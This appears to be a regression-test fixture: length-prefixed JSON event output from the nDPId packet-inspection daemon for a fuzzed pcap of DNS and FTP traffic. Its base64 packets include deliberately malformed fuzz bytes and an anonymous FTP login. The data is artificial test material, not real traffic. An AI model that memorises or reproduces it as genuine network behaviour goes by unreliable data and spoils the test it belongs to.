00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="}
00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469634896}
00366{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"AODtAW69ADBUADRWCABVAAAweP9AADkGcTeT6gH9wKgBAgAVCqDlH5UEr53DEHASYzbQ8AAAAQEEAgIEBYM="}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1120469634896}
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"ADBUADRWAODtAW69CABFAAAoaa1eAIAGOZHAqAECk+oB\/QqgABWvncMQ5R+VBVAQQiQelgAA"}
00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"}
00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120469635012,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1120469635012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1120469635012,"pkt":"ADBUACRWAODtAW69CABFAAA0aa9AAIAGOYPAqAECk+oB\/Qp3ABWvncMg5R+Vb1AYQaK71QAAUEFTUyBkMHhhIQ0K"}
00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635042}
00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469635042,"pkt":"ADBUADRWAODtAW69CAAGAAAoabBAAIAGOY7AqAECk+oB\/QqgABWvncMs5R+VqVAQQYAeegAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635042,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635042,"pkt":"AODtAW69ADBUBDRWCABFEAAreQZAADkGcSWT6gH9wAIBAgAVCqDlH5Wpr53DLFAYYzbSqwAAIA0KAAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120469635043,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1120469635043,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1120469635043,"pkt":"AODtAW69ADBUADRWCABFEABDeQdAADkGcQyT6gH9wKgBQgAVCqDlH5Wsr53DLFAYYzYWCgAAIC9wdWIJCS0+IFB1YmxpYyBGb2xkZXIuIA0K"}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635044}
00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":62,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635044,"pkt":"AODtAW69ADBUADRWCABFJXMAeQpAADkGcQOT6gH9wKgBAgB4CqDlH5YGr53DLFAYY3bTEAAAIC9pbmNvbWluZwktJXMAbmNvbWluZyBGb2xkZXIuIA0K"}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120469635045,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUADRWCABFEABjeQtAADkGcOiT6gGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":53,"global_ts_msec":1120469635045}
00398{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":87,"pkt_l4_len":0,"thread_ts_msec":1120469635045,"pkt":"AODtAW69ADBUJXMACABFEBBJeQxAADkGcQGT6gH5wKgBAggVCqDlH5Zir53DLFAYYzaAtgAAIC9vdXRnb2luZwktPiBvdXRnb2luZyBGb2xkZXIuIA0K"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635048,"pkt":"AODtAW69ADBUADRWCABFEABjeQ9AADkGcOST6gH9wKgBAgAVCqzlH5bBr53DLFAYYzY9pwAAIEZpbGVzIGxhcmdlciB0aGVuIDI1ME1CIHdpbGwgYmUgZGVsZXRlZCBhZnRlciA1IGRheXMgISEhDQo="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635049,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635046,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635046,"pkt":"AKrtAW69ADBUADRWCABFEAAreQ5AADkGcR2T6gH9wKgBAgAVCKDlH5a+r53DLFgYYzbRlgAAIFUKAAAA"}
